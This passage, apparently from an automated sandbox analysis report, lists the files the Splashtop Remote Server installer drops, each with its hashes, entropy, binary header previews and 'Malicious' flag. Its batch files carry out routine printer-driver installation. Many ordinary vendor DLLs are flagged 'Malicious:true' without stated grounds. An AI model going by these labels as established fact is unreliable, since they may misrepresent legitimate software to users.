                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:XizpEi8PNuoyZLy39r4BRyFr8Tjqe1LP+0hORTj8i0K:XUpX8FYFyB8T2oyREtK
                                                                                                                                                                                                                                                                                                                                  MD5:4FFADA79BA20A933429F72D3B8CF61D9
                                                                                                                                                                                                                                                                                                                                  SHA1:77E7346EF7E7A31A8000150B4B0E4B21CA3BF381
                                                                                                                                                                                                                                                                                                                                  SHA-256:0FF6DD54C4DC7368BD7BAEFFA8CBD294DB31AA318F8F0FBD9088C15B61EB8854
                                                                                                                                                                                                                                                                                                                                  SHA-512:839ABEBEF1A76D168043C8DDFB6B8DF958CA89C3DF602B5B538EB6398332E785C4B0359CB6DF557252BD1191BCAC5C1E1AED6942D2848B5C898BA2FC8EF8D0B7
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........c....j..j..j.z...j..k...j.z...j.z....j.z...j.z....j.z...j.z...j.Rich..j.................PE..L....N.\...........!.........b......%........ ......................................O.....@.............................z............`...............T..`A...p.......................................C..@............................................text............................... ..`.data....2... ......................@....rsrc........`.......&..............@..@.reloc..t&...p...(...,..............@..B........................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STPrinter\win10\32bits\xdscale.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):204128
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.5795919533739005
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:9w8wZDxspqPfbuSqQCoSz6/e1+1FiATl8i9:fw3owojmVW0
                                                                                                                                                                                                                                                                                                                                  MD5:B4AD99DFCCB67C77F6C8E142EE5AD5BA
                                                                                                                                                                                                                                                                                                                                  SHA1:D10B7BE8A5C339185B8E409D4C0BE2103230BAA0
                                                                                                                                                                                                                                                                                                                                  SHA-256:5A280F84B70F41D90B122DBC8E8FCBDA414353CC5C87580FA30B3B51B7696207
                                                                                                                                                                                                                                                                                                                                  SHA-512:EEBC321D90737E161B452D6E27398D1CC1D4737DBE90F7FE5C407C1732178E30CD87228FB0C8B6C6F3B118DC7E46985D231F3059996452861BFCA1AD4A098077
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........c!...O..O..O.z...O..N...O.z...O.z....O.z...O.z....O.z...O.z...O.Rich..O.........PE..L....N.\...........!.........h......Z}....................................... .......-....@.............................|............... ...............`A......4... ................................M..@............................................text...<........................... ..`.data....3..........................@....rsrc... ...........................@..@.reloc...-..........................@..B................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STPrinter\win10\32bits\xdsmplui.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):254816
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.5058723884762335
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:kw+rqKMvEZF6VPvVpb1eTjLp8D3qkTmII9b9zC+l+smDP00IPWx2wUj8ii:kdrWgFEPNB+MPTHIWjP00IedH
                                                                                                                                                                                                                                                                                                                                  MD5:BB8D8CE6F052BE2BA3A39768528B88C6
                                                                                                                                                                                                                                                                                                                                  SHA1:0C2D48F22C7231C52C9FDDD35120E971ABA05EC4
                                                                                                                                                                                                                                                                                                                                  SHA-256:B61BA88D2BB36A0A56F00C455BBC530703415F176B5715E9D24FAB82CC935140
                                                                                                                                                                                                                                                                                                                                  SHA-512:EF3CED636733BCF45CE4E1D21D33F50945D6FFE2A5478A19D538A30C3071E5F78D539B0E3718EEAF404614EEE182E60AE3697E499C0D7EC769D272CD5B58CCA9
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r.Cr.Cr.C{.2Cy.Cr.C..C{.4Cg.C{."C..C{.3Cs.C{.%C*.C{.5Cs.C{.0Cs.CRichr.C................PE..L....N.\...........!.........................0.......................................l....@..........................(..k.......x........!..............`A.......,.. ...............................xO..@............................................text...+........................... ..`.data....@...0...$..................@....rsrc....!......."...B..............@..@.reloc...=.......>...d..............@..B........................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STPrinter\win10\32bits\xdwmark.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):248160
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.1098745205591625
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:AG9NqQQHPItXExQNj+mB92u+CW5D37LnuHc45X0T5/uyFNJpfUarTtvU8il:f9AP2b+mBQVJLnYlETtug5jw
                                                                                                                                                                                                                                                                                                                                  MD5:62945189F63210AFE22EC07C93A323C2
                                                                                                                                                                                                                                                                                                                                  SHA1:ADEE11D641B6BC9E9F46B95388680D291C795A33
                                                                                                                                                                                                                                                                                                                                  SHA-256:DD36F7448202BB06C634DD18F911B830615B61E9849900C7DCD92B1157F2C671
                                                                                                                                                                                                                                                                                                                                  SHA-512:B62D7E7668F2E02330690D373EFB815FBBBD12E771FDB4EA46EDA8386AB8A969DB40158132F8C15ACA65C87CDF8920D46075055BB9B73DF42FD49777DF7EB6BD
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........................_.........B....Y......O.....^......H.....X......].....Rich....................PE..L....N.\...........!.........t...............@............................................@.........................p<..|...<1..........................`A..........P................................C..@............................................text....,.......................... ..`.data...@2...@.......2..............@....rsrc................H..............@..@.reloc...*.......,...\..............@..B........................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STPrinter\win10\64bits\XDColMan.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):258400
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.288592681682295
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:6144:I3LIl4XgsSVloTnPYdn7lJZRZ8QXqsJ3H+:IUlJVmgh5asJ3+
                                                                                                                                                                                                                                                                                                                                  MD5:372C4A2430E2BF3E0A3C0D51996ADEA5
                                                                                                                                                                                                                                                                                                                                  SHA1:F6F2F8D750D08BE940AE2B655804C106E9C7491D
                                                                                                                                                                                                                                                                                                                                  SHA-256:FE632C826ABA5F694DE6684506B72BDECBFD712E9DE2ACDDDE1F2C880EE2646B
                                                                                                                                                                                                                                                                                                                                  SHA-512:C017A180893D39463068DA5DF647D959603CEE7979CA420963FEF9D09309FCA0B744D7268DC2A0FC4AFCD41F912714CF14003CC9AC5FB6A033AA91962E9981C3
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......>.V.z`8.z`8.z`8.s...{`8.s...u`8.z`9..`8.s...s`8.s...O`8.s....`8.s...{`8.s...Y`8.s...{`8.s...{`8.Richz`8.........PE..d....N.\.........." .....H................................................................@..........................................U..}....J...................)......`A......`...@................................................................................text...-F.......H.................. ..`.data....O...`...*...L..............@....pdata...).......*...v..............@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STPrinter\win10\64bits\stprintmon.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):237008
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.30179636306813
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:B+2HsTNg3ex5PUwoEK2dvK7PnGxOkf9V3QhjTvI9Nle9owmPDXpUIJonb:BDHsT2qvoEKMAGxOkVJQhjTAEgY
                                                                                                                                                                                                                                                                                                                                  MD5:7DD3CA728E061F9C438209935DF41FD8
                                                                                                                                                                                                                                                                                                                                  SHA1:D291C17619FB2E9B8A4CF07B53A56DC60CFB4C8E
                                                                                                                                                                                                                                                                                                                                  SHA-256:F19F300E4623E3B57F870D8E4B150F2E70D29E6CB47750671D53667BB0804202
                                                                                                                                                                                                                                                                                                                                  SHA-512:E7D0AB0EB37F6B245B1EBDE46C2D9184AB801EB659E4F4ED7C2AFD07843A1646612290AD3C315EE9BF7FC1A9425B58E2A03810014DDBB621EB46B331AA2E753E
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............w..w..w...&..w...&..:w...&-.w..c.9.w..w...w..%..w..%..w..%).w..we.w..%,.w..Rich.w..................PE..d...+..Z.........." ................|N..............................................;.....`.........................................`;..Y....;..................0!..............T...@...8...............................p............................................text...[........................... ..`.rdata..............................@..@.data....?...P.......8..............@....pdata..0!......."...T..............@..@.rsrc................v..............@..@.reloc..T............~..............@..B........................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STPrinter\win10\64bits\xdbook.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):178016
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.354805848687379
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:X0fRIF+SwIL9Bagg2mCEPToX/ITpu0uOpDSgb2WXa+qubG8iu:EfaCIJbglCe1Vu0uIDSlWtf
                                                                                                                                                                                                                                                                                                                                  MD5:D16039589730B0C6E6B5227C041FB1B4
                                                                                                                                                                                                                                                                                                                                  SHA1:F8F942DBB62CBC15F7ED0BE8750C9C564638FBF8
                                                                                                                                                                                                                                                                                                                                  SHA-256:ACA0DF6F5EB1DE40506943B30BBDA614F886523C093F5C9A3587C3E1161F0DF0
                                                                                                                                                                                                                                                                                                                                  SHA-512:35ED0D4AD06E4979970CA2AD58B81735E50AAB755605216BB059EBE698B82F6C627F5F7E29ADC9FB3BC58C7EFB4E8ACA2B323F2E2813D4EA7EE39363DE0E1D64
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........#U..pU..pU..p\..p^..pU..p8..p\..pT..p\..p\..p\..pe..p\..p"..p\..pT..p\..pA..p\..pT..p\..pT..pRichU..p........................PE..d....N.\.........." .....*...j......................................................K.....@.........................................`8..{.......x....................v..`A..........p................................................................................text....(.......*.................. ..`.data....?...@......................@....pdata...............L..............@..@.rsrc................h..............@..@.reloc...............n..............@..B........................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STPrinter\win10\64bits\xdnup.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):196448
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.349185940783631
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:lSUAV0AVZrAVOVrHYapV5Ddr1oxkg9gh0CBEACcodM5nY+WVFGoEM8ip:AvPb6OVrVNJ1ufqBEACjG/Y
                                                                                                                                                                                                                                                                                                                                  MD5:A88901EB863EC013B461A84DACB4C795
                                                                                                                                                                                                                                                                                                                                  SHA1:40303F44732A2C8DBEAF4EC13CD32FCED66D8F8A
                                                                                                                                                                                                                                                                                                                                  SHA-256:FF295F8914F76DFE707455FE633BFC42B805BB4D3274C2290E1E5D56A383E969
                                                                                                                                                                                                                                                                                                                                  SHA-512:92BD7F2CE6DB83A744972503B4352ADC210FE10C0BDC026F953A925361365E95B79A4A1CEF3677266AE7178FAC24AA64A353115362E987F1DFD84BA38A6F9B25
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........4...Z...Z...Z......Z...[..Z.......Z.......Z......Z......Z.......Z......Z.......Z.......Z.Rich..Z.................PE..d....N.\.........." .....n...n...........................................................@.........................................0}..z....r..........................`A..............................................................X............................text....m.......n.................. ..`.data....?...........r..............@....pdata........... ..................@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STPrinter\win10\64bits\xdscale.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):253792
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.319719994714089
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:6144:NuctDSdRbMOiymM/Cufn5B+1jowgreeTwcV1:NqXMOFmA5VwgBEg1
                                                                                                                                                                                                                                                                                                                                  MD5:668A98269B12A2C17E39137AC8D7B716
                                                                                                                                                                                                                                                                                                                                  SHA1:E438E9031338158FE70B9D7821200DC4929380CA
                                                                                                                                                                                                                                                                                                                                  SHA-256:200D323E0842ABC93E22F6D475928AB0DAC6AA9F3824CF8E729E8049852AC54A
                                                                                                                                                                                                                                                                                                                                  SHA-512:E2E425489A084022AE23AF65D4869B24A247E3159DA5ED4E31B0CDB11C0BE30AF9EEA12ECF68F9C8269B60ECC1BB489F3EFDE00F4F8885AA2631EFAB3E54BCBC
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......kNgi//.://.://.:&W.: /.://.:R/.:&W.:./.:&W.:&/.:&W.:./.:&W.:W/.:&W.:./.:&W.:./.:&W.:./.:&W.:./.:Rich//.:................PE..d....N.\.........." .....>...~......`................................................8....@..........................................L..|....@.......... ........*......`A...........................................................................................text....=.......>.................. ..`.data....A...P... ...B..............@....pdata...*.......,...b..............@..@.rsrc... ...........................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STPrinter\win10\64bits\xdsmplui.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):342368
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.187004427741537
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:6144:T7NLhV1jxjcVfgFf6QlJpYw4MxuiMRZI7CPdxV4eZ+PyRPP00I7Q:T71j1aVfgFiQ/ug/GMQ
                                                                                                                                                                                                                                                                                                                                  MD5:96BDC666BCD7D432D6C7D4170C8E6046
                                                                                                                                                                                                                                                                                                                                  SHA1:1B705A191731ECA3369435D9906C8275C5D326C2
                                                                                                                                                                                                                                                                                                                                  SHA-256:DC4C32919B533A79D9EA76BDE59975DD149AA9C7B7278B076019C080A3A97C56
                                                                                                                                                                                                                                                                                                                                  SHA-512:DDD9E42633F98A7E5F6F7E3E4571815F9D80EA16084B23A82DBE22E929FD6F0BD791EB3DFA7BB229D73D101C66077C99FE47A5CEAB1DF6917A6E4DF209853162
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........f2Ji.aJi.aJi.aC..aKi.aC..aAi.aJi.a?i.aC..aCi.aC..azi.aC..a>i.aC..aKi.aC..aci.aC..aKi.aC..aKi.aRichJi.a........................PE..d....N.\.........." .....P...........N.......................................@......~d....@..........................................]..k....S..x........!.......:......`A...0..........................................................P............................text...[N.......P.................. ..`.data....V...`...6...T..............@....pdata...:.......<..................@..@.rsrc....!......."..................@..@.reloc.......0......................@..B........................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STPrinter\win10\64bits\xdwmark.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):282464
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.880530047125276
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:6144:tj4c/JPjXOQTuGkfIpmWpnETJLnYlETtuwv:tj4cBbEZTTJDY+jv
                                                                                                                                                                                                                                                                                                                                  MD5:F26D954E0F23049CAA4F698934DB5371
                                                                                                                                                                                                                                                                                                                                  SHA1:B0FC39DFF9871778A767B95F0D1CD6E56F939071
                                                                                                                                                                                                                                                                                                                                  SHA-256:186500D4E31ADF5FA2DC02F112EDE6FCA86C1BC48731EA224CFE83C160ABD1CD
                                                                                                                                                                                                                                                                                                                                  SHA-512:BF79667EC9E85FCC6214BB8B3352DCF4B43A042708F471C293B507574A446D938C4E5981C6E9FA4E81AF98A91B6A72CB678F06B91E064F3FCA48744DC0DFF94F
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........}?...QH..QH..QH.d.H..QH..PH?.QH.d.H..QH.d.H..QH.d.H..QH.d.H..QH.d.H..QH.d.H..QH.d.H..QH.d.H..QHRich..QH................PE..d....N.\.........." .........................................................`...........@.............................................|............0...........$......`A...P......`................................................................................text............................... ..`.data....>..........................@....pdata...$.......&..................@..@.rsrc........0......................@..@.reloc.......P......................@..B................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STPrinter\win10\install_driver.bat

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):870
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.164710229415834
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:12:kcrGqwAcK/EyAZRVowyyAcK/E2kam0LYDeegidym0EZkBqq6JFpYpFSqq6JFrmp5:BrWWFwD7WR8mI/xOZE
                                                                                                                                                                                                                                                                                                                                  MD5:50B0957220D10275274CAC025EAA6883
                                                                                                                                                                                                                                                                                                                                  SHA1:8F677ED1CD73A05F634AA06AD6BED1DA4C6BD80F
                                                                                                                                                                                                                                                                                                                                  SHA-256:B76D74AEC705A3F9FD055307A966777ADB279FB06D03524C992E608FE73AEB22
                                                                                                                                                                                                                                                                                                                                  SHA-512:C62DAAC3AC516500D819718BF5697D948B6EB684276A21A80E6E9C26FE5F1D0593D7FE281702D3BC48D2A1897B0EB7BD910CEE0978950C0F6636FB86E72B6BD3
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:echo off..cd %~dp0....\utils\PrnPort.exe /a >> inst.log..rundll32 printui.dll,PrintUIEntry /q /dl /n "Splashtop Remote Printer"..rundll32 printui.dll,PrintUIEntry /if /b "Splashtop Remote Printer" /f stprinter.inf /r "StPrinter" /m "Splashtop Remote Printer"..rundll32 printui.dll,PrintUIEntry /q /dl /n "Splashtop Remote Printer"....for /f "tokens=*" %%a in ( 'DIR "%WINDIR%\System32\DriverStore\FileRepository\stprint*" /B /ON /AD' ) do (.. reg add "HKLM\SOFTWARE\Splashtop Inc.\Splashtop Remote Server" /f /v "PrinterINFa" /t REG_SZ /d "%WINDIR%\System32\DriverStore\FileRepository\%%a\stprinter.inf" >> inst.log.. IF NOT EXIST "%ProgramData%\Splashtop" mkdir "%ProgramData%\Splashtop".. IF NOT EXIST "%ProgramData%\Splashtop\Temp" mkdir "%ProgramData%\Splashtop\Temp".. ECHO Found "%WINDIR%\System32\DriverStore\FileRepository\%%a\stprinter.inf" >> inst.log..)..

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STPrinter\win10\install_driver64.bat

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):882
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.192332970304343
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:12:kcrGqwAcK/EyAZRVowyyAcK/E2kam0LYDfyegidym0EZkBqq6JFpYpFSqq6JFrm7:BrWWFwD7WR8fCI/xOZE
                                                                                                                                                                                                                                                                                                                                  MD5:16BBC22B18C5325649C98DD02F3DDDBF
                                                                                                                                                                                                                                                                                                                                  SHA1:B6F97171D20CBC84DEDB07C304F92B25B5A08450
                                                                                                                                                                                                                                                                                                                                  SHA-256:8C3BED319076C7B27FB5D9CD7DCE31E8EE09624E191BC3D709962426FB12951A
                                                                                                                                                                                                                                                                                                                                  SHA-512:293E8BF93A22021FD80AA95A30965287BF40F5030DA457BC16D004E86C3B3FF8983DA8C0D743A42F1CBF935A2EB8E1CB5FCB488914B51330686B2C60BD1C71B9
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:echo off..cd %~dp0....\utils\PrnPort.exe /a >> inst.log..rundll32 printui.dll,PrintUIEntry /q /dl /n "Splashtop Remote Printer"..rundll32 printui.dll,PrintUIEntry /if /b "Splashtop Remote Printer" /f stprinter.inf /r "StPrinter" /m "Splashtop Remote Printer"..rundll32 printui.dll,PrintUIEntry /q /dl /n "Splashtop Remote Printer"....for /f "tokens=*" %%a in ( 'DIR "%WINDIR%\System32\DriverStore\FileRepository\stprint*" /B /ON /AD' ) do (.. reg add "HKLM\SOFTWARE\Wow6432Node\Splashtop Inc.\Splashtop Remote Server" /f /v "PrinterINFa" /t REG_SZ /d "%WINDIR%\System32\DriverStore\FileRepository\%%a\stprinter.inf" >> inst.log.. IF NOT EXIST "%ProgramData%\Splashtop" mkdir "%ProgramData%\Splashtop".. IF NOT EXIST "%ProgramData%\Splashtop\Temp" mkdir "%ProgramData%\Splashtop\Temp".. ECHO Found "%WINDIR%\System32\DriverStore\FileRepository\%%a\stprinter.inf" >> inst.log..)..

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STPrinter\win10\p_mount.bat

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):214
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.631936044721133
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:6:Hjsm6y9jcK/ES2d6y9jcKZS2bVXzLYwkrnRS2n:DWAcK/EyAcKZRVowyh
                                                                                                                                                                                                                                                                                                                                  MD5:88E59700F53DE95D2847B9687764BE30
                                                                                                                                                                                                                                                                                                                                  SHA1:CD5780DBF1C711B9C28DC001F4149BA3251BECF7
                                                                                                                                                                                                                                                                                                                                  SHA-256:B085F4E0D6A7A4DC967C96D7C318CB749BC497135FD9E35D7AD0C88E6C53F577
                                                                                                                                                                                                                                                                                                                                  SHA-512:6E7D2FD4CF87B63BAB39E225362ECBE60F52FAB0DA42C97834B8EA59D653CDBD06B98E2C490C5465B1999AF2F7869F729CBFC34E55D5ECC768D85D48B9874374
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:cd %~dp0..rundll32 printui.dll,PrintUIEntry /q /dl /n "Splashtop Remote Printer"..rundll32 printui.dll,PrintUIEntry /q /if /b "Splashtop Remote Printer" /f stprinter.inf /r "StPrinter" /m "Splashtop Remote Printer"

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STPrinter\win10\p_unmount.bat

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):203
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.068283784998216
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3:mKDDQFGCTWYdym6F9K2MLgZ+X0KcK/F+N7oaf/DEd7/JQF9K2MLgZ+X0KcK/FvK2:hsICTJ6y9jcK/ePD0Sy9jcK/ES2uz
                                                                                                                                                                                                                                                                                                                                  MD5:FA3C191799254E542687F1F5D0974BC5
                                                                                                                                                                                                                                                                                                                                  SHA1:DC85AAC2AA31CD3DE9017E7E099581457AD4FBF2
                                                                                                                                                                                                                                                                                                                                  SHA-256:347B12E6E2FC79E2A3668625341D7642D531159FFE5B01AB2BC5469E0EFC6B3F
